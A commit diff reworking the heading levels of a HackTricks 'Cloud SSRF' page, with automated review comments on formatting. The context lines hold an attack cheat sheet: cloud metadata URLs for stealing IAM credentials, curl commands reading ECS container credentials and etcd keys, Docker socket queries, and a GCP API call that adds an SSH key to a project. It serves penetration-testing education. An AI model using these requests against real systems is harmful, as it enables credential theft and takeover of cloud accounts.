GitBook: [#3174] No subject
parent 453d24f044
commit ff681fc8fc
@ -1,4 +1,4 @@
|
||||
|
||||
# Cloud SSRF
|
||||
|
||||
<details>
|
||||
|
||||
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
</details>
|
||||
|
||||
## AWS
|
||||
|
||||
# AWS
|
||||
### Abusing SSRF in AWS EC2 environment
|
||||
|
||||
## Abusing SSRF in AWS EC2 environment
|
||||
|
||||
### 169.254.169.254 - Metadata Address
|
||||
#### 169.254.169.254 - Metadata Address
|
||||
|
||||
**Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
|
||||
|
||||
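Review bot: the heading levels for the AWS section need checking, because this hunk shows `AWS` at both `## AWS` and `# AWS`, `Abusing SSRF in AWS EC2 environment` at both `###` and `##`, and `169.254.169.254 - Metadata Address` at both `###` and `####`. With `# Cloud SSRF` as the page title, the provider heading should end up at `##`, its sections at `###` and the metadata-address subsection at `####`, matching `## GCP`, `## Azure` and the other providers later in the patch, so that the file keeps a single H1.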
@ -74,7 +73,7 @@ Another possible interesting place where you can find credentials is in[ http://
|
||||
|
||||
[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges
|
||||
|
||||
## SSRF in AWS ECS (Container Service) credentials
|
||||
### SSRF in AWS ECS (Container Service) credentials
|
||||
|
||||
**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
|
||||
|
||||
@ -86,7 +85,7 @@ You could be able to read it exploiting an **Path Traversal** to _file:///proc/s
|
||||
curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
|
||||
```
|
||||
|
||||
## SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
|
||||
### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
|
||||
|
||||
We retrieve the `accountId` and `region` from the API.
|
||||
|
||||
@ -105,9 +104,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
|
||||
|
||||
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
|
||||
|
||||
# GCP <a href="#6440" id="6440"></a>
|
||||
## GCP <a href="#6440" id="6440"></a>
|
||||
|
||||
## SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
|
||||
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
|
||||
|
||||
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
|
||||
|
||||
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
|
||||
|
||||
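Review bot: `id="6440"` is attached to both the `GCP` heading and the `SSRF URL for Google Cloud` heading in this hunk, so the two anchors collide and `#6440` can resolve to only one of them; give the `## GCP` heading its own id or drop the anchor from it. In the same hunk, `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/` hard-codes `us-east-2` although the preceding text says the `region` is retrieved from the API, so a region placeholder next to `[ACCOUNT_ID]` would be consistent. The context line `you can access the metadata endpoint in with the following URLs` also has a stray `in`.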
@ -193,7 +194,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
|
||||
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
|
||||
```
|
||||
|
||||
## Add an SSH key <a href="#3e24" id="3e24"></a>
|
||||
### Add an SSH key <a href="#3e24" id="3e24"></a>
|
||||
|
||||
Extract the token
|
||||
|
||||
@ -222,7 +223,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
|
||||
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
|
||||
```
|
||||
|
||||
# Digital Ocean <a href="#9f1f" id="9f1f"></a>
|
||||
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
|
||||
|
||||
Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
|
||||
|
||||
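Review bot: the `curl -X POST` example named in this hunk's header still carries a literal project number (`projects/1042377752888/`) while its payload uses the placeholders `sshkeyname` and `sshkeyvalue`; replace the number with a placeholder as well, so the example does not point at a specific project.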
@ -238,11 +239,11 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
|
||||
curl http://169.254.169.254/metadata/v1.json | jq
|
||||
```
|
||||
|
||||
# Packetcloud <a href="#2af0" id="2af0"></a>
|
||||
## Packetcloud <a href="#2af0" id="2af0"></a>
|
||||
|
||||
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
|
||||
|
||||
# Azure <a href="#cea8" id="cea8"></a>
|
||||
## Azure <a href="#cea8" id="cea8"></a>
|
||||
|
||||
Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/)
|
||||
|
||||
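Review bot: the header context of this hunk reads `.../ipv6/addressAll in one re`, so the last URL of the Digital Ocean list and the caption that follows it are fused on one line; restore the line break (and close the code fence before the caption if it is meant as prose) while the section is being touched.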
@ -255,7 +256,7 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
|
||||
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
|
||||
```
|
||||
|
||||
# OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
|
||||
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
|
||||
|
||||
(header required? unknown)
|
||||
|
||||
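Review bot: `(header required? unknown)` under `## OpenStack/RackSpace` is an open question left in published text, and the same line recurs under `## HP Helion`; either check it against the provider documentation and state the answer, or mark the entry as unverified in a full sentence.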
@ -263,7 +264,7 @@ http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/pu
|
||||
http://169.254.169.254/openstack
|
||||
```
|
||||
|
||||
# HP Helion <a href="#a8e0" id="a8e0"></a>
|
||||
## HP Helion <a href="#a8e0" id="a8e0"></a>
|
||||
|
||||
(header required? unknown)
|
||||
|
||||
@ -271,7 +272,7 @@ http://169.254.169.254/openstack
|
||||
http://169.254.169.254/2009-04-04/meta-data/
|
||||
```
|
||||
|
||||
# Oracle Cloud <a href="#a723" id="a723"></a>
|
||||
## Oracle Cloud <a href="#a723" id="a723"></a>
|
||||
|
||||
```
|
||||
http://192.0.0.192/latest/
|
||||
@ -280,7 +281,7 @@ http://192.0.0.192/latest/meta-data/
|
||||
http://192.0.0.192/latest/attributes/
|
||||
```
|
||||
|
||||
# Alibaba <a href="#51bd" id="51bd"></a>
|
||||
## Alibaba <a href="#51bd" id="51bd"></a>
|
||||
|
||||
```
|
||||
http://100.100.100.200/latest/meta-data/
|
||||
@ -288,7 +289,7 @@ http://100.100.100.200/latest/meta-data/instance-id
|
||||
http://100.100.100.200/latest/meta-data/image-id
|
||||
```
|
||||
|
||||
# Kubernetes ETCD <a href="#c80a" id="c80a"></a>
|
||||
## Kubernetes ETCD <a href="#c80a" id="c80a"></a>
|
||||
|
||||
Can contain API keys and internal ip and ports
|
||||
|
||||
@ -297,7 +298,7 @@ curl -L http://127.0.0.1:2379/version
|
||||
curl http://127.0.0.1:2379/v2/keys/?recursive=true
|
||||
```
|
||||
|
||||
# Docker <a href="#ac0b" id="ac0b"></a>
|
||||
## Docker <a href="#ac0b" id="ac0b"></a>
|
||||
|
||||
```
|
||||
http://127.0.0.1:2375/v1.24/containers/jsonSimple example
|
||||
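Review bot: inside the Docker code fence, `http://127.0.0.1:2375/v1.24/containers/jsonSimple example` fuses the URL with the `Simple example` caption, so a reader who copies the line gets a path that does not exist; split it into the URL and a separate caption line, either outside the fence or as a comment.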
@ -306,13 +307,12 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
|
||||
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
||||
```
|
||||
|
||||
# Rancher <a href="#8cb7" id="8cb7"></a>
|
||||
## Rancher <a href="#8cb7" id="8cb7"></a>
|
||||
|
||||
```
|
||||
curl http://rancher-metadata/<version>/<path>
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
@ -328,5 +328,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|